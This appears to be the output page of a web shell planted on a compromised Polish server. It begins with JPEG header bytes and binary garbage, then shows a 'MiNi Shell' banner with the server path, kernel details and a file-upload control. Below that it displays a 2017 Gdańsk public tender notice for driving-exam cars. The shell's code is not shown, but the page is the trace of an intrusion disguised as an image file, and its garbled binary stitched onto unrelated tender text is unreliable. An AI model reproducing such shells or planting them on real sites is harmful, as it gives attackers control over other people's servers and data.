JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170210/23421-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.pord.pl' target='_blank'>http://www.pord.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 23421 - 2017
              z dnia 2017-02-10 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gdańsk: dostawa:
I.	100 sztuk fabrycznie nowych samochodów osobowych, w tym w drodze cyklicznej wymiany 80 sztuk, przeznaczonych do przeprowadzania egzaminów państwowych i szkoleń  w zakresie prawa jazdy kategorii B; 
II.	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E oraz w zakresie prawa jazdy kategorii B z kodem 96; 
III.	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Pomorski Ośrodek Ruchu Drogowego w Gdańsku, krajowy numer identyfikacyjny
              19147450500000, ul.
              ul. Równa 
              ,
              80067  
              Gdańsk, woj.
              pomorskie, państwo
              Polska, tel.
              58 300 15 26, e-mail
              pordzp@wp.pl, faks
              58 300 15 29.
              <br />
              Adres strony internetowej (URL): www.pord.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: inna jednostka organizacyjna samorządu terytorialnego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pord.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  tak
                <br />www.pord.pl</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />POMORSKI OŚRODEK RUCHU DROGOWEGO w GDAŃSKU<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />80-067 Gdańsk, Równa 19/21</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>dostawa:
I.	100 sztuk fabrycznie nowych samochodów osobowych, w tym w drodze cyklicznej wymiany 80 sztuk, przeznaczonych do przeprowadzania egzaminów państwowych i szkoleń  w zakresie prawa jazdy kategorii B; 
II.	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E oraz w zakresie prawa jazdy kategorii B z kodem 96; 
III.	1 sztuki fabrycznie nowego samochodu osobowego, przeznaczonego do przewozu 9 osób łącznie z kierowcą, przeprowadzania egzaminów państwowych i szkoleń w zakresie prawa jazdy kategorii B+E.
<br /><b>Numer referencyjny: </b>1/PN/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt. 7. (dotyczy ZADANIA 1) poprzez:
dostawę 16 sztuk samochodów osobowych, w tym w drodze cyklicznej wymiany                 12 sztuk, przeznaczonych do przeprowadzania egzaminów państwowych i szkoleń              w zakresie prawa jazdy kategorii B. 
Dostarczone przez Wykonawcę samochody osobowe muszą być fabrycznie nowe, jednej marki i jednego modelu, kompletne, wolne od wad prawnych, materiałowych     i wykonawczych (rocznik ostatniej wymiany zgodny z rokiem realizacji), posiadających parametry techniczne i wyposażenie, i wszystkie inne wymogi takie jak w ZADANIU 1.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 48<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                 Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a.informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;

b.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,                  że Wykonawca nie zalega z opłaceniem podatków, wystawionego nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

c.	oświadczenie Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U.  z 2016 r. poz. 716),

d.	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek              na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej                         niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem                w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami,  w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie                          lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,

e.	odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 uPzp,

f.	oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne,

g.	certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania                  z badań przeprowadzonych przez tę jednostkę, jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia. 
Zamawiający żąda np. świadectwa homologacji oferowanych samochodów osobowych, wydanego przez upoważnioną jednostkę lub świadectwa zgodności WE zawierającego spełnienie warunków granicznych norm czystości spalin Euro 6.
Zamawiający akceptuje również certyfikaty wydane przez inne równoważne jednostki oceniające zgodność.
Zamawiający akceptuje odpowiednie środki dowodowe inne niż te, o których mowa powyżej, w szczególności dokumentację techniczną producenta, w przypadku gdy dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, o których mowa powyżej, ani możliwości ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy, oraz pod warunkiem że dany Wykonawca udowodni, że wykonywane przez niego dostawy spełniają wymogi i kryteria określone               w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.2.	spełniają warunki udziału w postepowaniu dotyczące:
a.	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału,

b.	sytuacji ekonomicznej lub finansowej:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału,

c.	zdolności technicznej lub zawodowej:
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">ZADANIE 1
W przypadku, gdy oferowane przez Wykonawcę samochody osobowe posiadają system typu START-STOP lub inny system uniemożliwiający wykonanie zadań określonych w przepisach dotyczących egzaminowania, Wykonawca zobowiązany jest zapewnić możliwość trwałego ich wyłączenia bez utraty gwarancji.
Zamawiający zastrzega, że zaoferowane przez Wykonawcę samochody osobowe powinny posiadać możliwość montażu instalacji gazowej, bez utraty gwarancji producenta.
3.	Zamawiający wymaga, aby zaoferowane samochody osobowe (ZADANIE 1) spełniały następujące wymagania dotyczące zużycia energii, emisji dwutlenku węgla i emisji zanieczyszczeń (zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert                            w odniesieniu do niektórych rodzajów zamówień publicznych):

a.	powinny spełniać normę EURO 6 pod względem emisji tlenków azotu, tlenków węgla, węglowodorów;

b.	posiadały zużycie energii: nie więcej niż 1,92 MJ/km obliczone jako iloczyn średniego zużycia paliwa w cyklu mieszanym miejskim / pozamiejskim                      (wg danych technicznych) i wartości energetycznej benzyny.
Przy obliczeniu zużycia energii oferowanego samochodu osobowego należy zastosować:
	wartość energetyczną benzyny = 32MJ/l (podaną w załączniku                            nr 1 Rozporządzenia Prezesa Rady Ministrów z dnia 10 maja 2011 r.                  w sprawie innych niż cena obowiązkowych kryteriów oceny ofert                        w odniesieniu do niektórych rodzajów zamówień publicznych);

	wymóg Zamawiającego, aby średnie zużycie paliwa w cyklu mieszanym miejskim / pozamiejskim (wg danych technicznych) wynosiło nie więcej niż 0,06 l/km;

c.	posiadały emisję dwutlenku węgla: nie więcej niż 130 g/km.

4. Dostawa / wymiana samochodów osobowych odbywać się będzie na następujących zasadach:
a.	Wykonawca zobowiązany będzie w okresie realizacji umowy dotyczącej niniejszego przedmiotu zamówienia do cyklicznej wymiany (4 wymiany w okresie obowiązywania umowy) zakupionych i dostarczonych przez Wykonawcę Zamawiającemu samochodów osobowych po upływie 10 miesięcy a przed upływem 12 miesięcy od daty każdej kolejnej dostawy,

b.	samochody osobowe używane przez Zamawiającego (wcześniej zakupione u Wykonawcy na podstawie zawartej umowy) wymieniane będą przez Wykonawcę (w okresach opisanych w pkt. a powyżej) na samochody osobowe fabrycznie nowe, tej samej marki i jednego modelu co przy pierwszej dostawie, posiadające co najmniej takie same parametry techniczne oraz co najmniej takie samo wyposażenie,

c.	samochody osobowe będą dostarczone do i odebrane z siedziby Zamawiającego 
w Gdańsku, ul. Równa 19/21 oraz w Oddziale w Gdyni, ul. Opata Hackiego 10A, 
w obecności upoważnionych przedstawicieli Wykonawcy i Zamawiającego  zgodnie z ustalonym przez Strony, przed każdą dostawą/wymianą, harmonogramem,

d.	przekazanie samochodów osobowych Zamawiającemu i odbiór od Zamawiającego nastąpi na podstawie podpisanego przez przedstawicieli obu Stron protokołu zdawczo-odbiorczego bez uwag. Zamawiający dopuszcza odbiór przedmiotu zamówienia z uwagami pod warunkiem, że uwagi nie będą dotyczyły parametrów technicznych oraz nie będą miały wpływu na normalną eksploatację samochodów osobowych i przeprowadzanie egzaminów państwowych. W przypadku zawarcia uwag w protokole, Wykonawca jest zobowiązany do ich usunięcia w terminie do 14 dni od dnia sporządzenia protokołu zdawczo-odbiorczego.

e.	w ramach dostawy / wymiany Wykonawca wystawi Zamawiającemu za każdy dostarczony przez Wykonawcę fabrycznie nowy samochód osobowy fakturę (na cenę zgodną z ofertą), 

f.	w ramach sprzedaży / wymiany Zamawiający wystawi Wykonawcy za każdy przekazany Wykonawcy samochód osobowy fakturę (na cenę równą cenie nowo dostarczanego przez Wykonawcę samochodu osobowego),

g.	wszelkie uszkodzenia i wady samochodu osobowego przekazywanego Wykonawcy w ramach wymiany (o ile nie podlegają naprawie gwarancyjnej lub szkoda nie będzie likwidowana przez ubezpieczyciela w formie przyznanego odszkodowania)              będą usuwane przez Wykonawcę na koszt Zamawiającego. W takim przypadku nakłady roboczogodzin i kalkulacja szkód ustalone będą po wcześniejszym zaakceptowaniu przez Zamawiającego zakresu robót w oparciu o system EUROTAX na bazie stawki roboczogodziny obowiązującej u Wykonawcy,

h.	Wykonawca zobowiązany będzie do powiadomienia Zamawiającego                                o uszkodzeniach i wadach samochodu osobowego, o których mowa w pkt. g, niezwłocznie, lecz nie później niż w ciągu 14 dni od dnia ustalenia kwoty przyznanego odszkodowania lub zaistnienia innych okoliczności mogących mieć wpływ na uzyskanie odszkodowania i koszty naprawy. Po upływie tego terminu Wykonawca nie ma prawa domagać się od Zamawiającego dopłaty różnicy między przyznanym przez ubezpieczyciela odszkodowaniem, a poniesionymi kosztami naprawy.
ZADANIE 2 
W przypadku, gdy oferowany przez Wykonawcę samochód osobowy posiada system typu START-STOP lub inny system uniemożliwiający wykonanie zadań określonych w przepisach dotyczących egzaminowania, Wykonawca zobowiązany jest zapewnić trwałe                           ich wyłączenie bez utraty gwarancji.
Zamawiający wymaga, aby zaoferowany samochód osobowy (ZADANIE 2) spełniał następujące wymagania dotyczące zużycia energii, emisji dwutlenku węgla i emisji zanieczyszczeń (zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert                            w odniesieniu do niektórych rodzajów zamówień publicznych):

a.	powinien spełniać normę EURO 6 pod względem emisji tlenków azotu, tlenków węgla, węglowodorów oraz cząstek stałych;

b.	posiadać zużycie energii: nie więcej niż 3,6 MJ/km obliczone jako iloczyn średniego zużycia paliwa w cyklu mieszanym miejskim / pozamiejskim                       (wg danych technicznych) i wartości energetycznej oleju napędowego.

Przy obliczeniu zużycia energii oferowanego samochodu osobowego należy zastosować:
	wartość energetyczną oleju napędowego = 36MJ/l (podaną w załączniku nr 1 Rozporządzenia Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert w odniesieniu                        do niektórych rodzajów zamówień publicznych);

	wymóg Zamawiającego, aby średnie zużycie paliwa w cyklu mieszanym miejskim / pozamiejskim (wg danych technicznych) wynosiło nie więcej                   niż 0,10 l/km;

c.	emisja dwutlenku węgla: nie więcej niż 260 g/km. 

ZADANIE 3
W przypadku, gdy oferowany przez Wykonawcę samochód osobowy posiada system typu START-STOP lub inny system uniemożliwiający wykonanie zadań określonych w przepisach dotyczących egzaminowania, Wykonawca zobowiązany jest zapewnić trwałe                           ich wyłączenie bez utraty gwarancji.
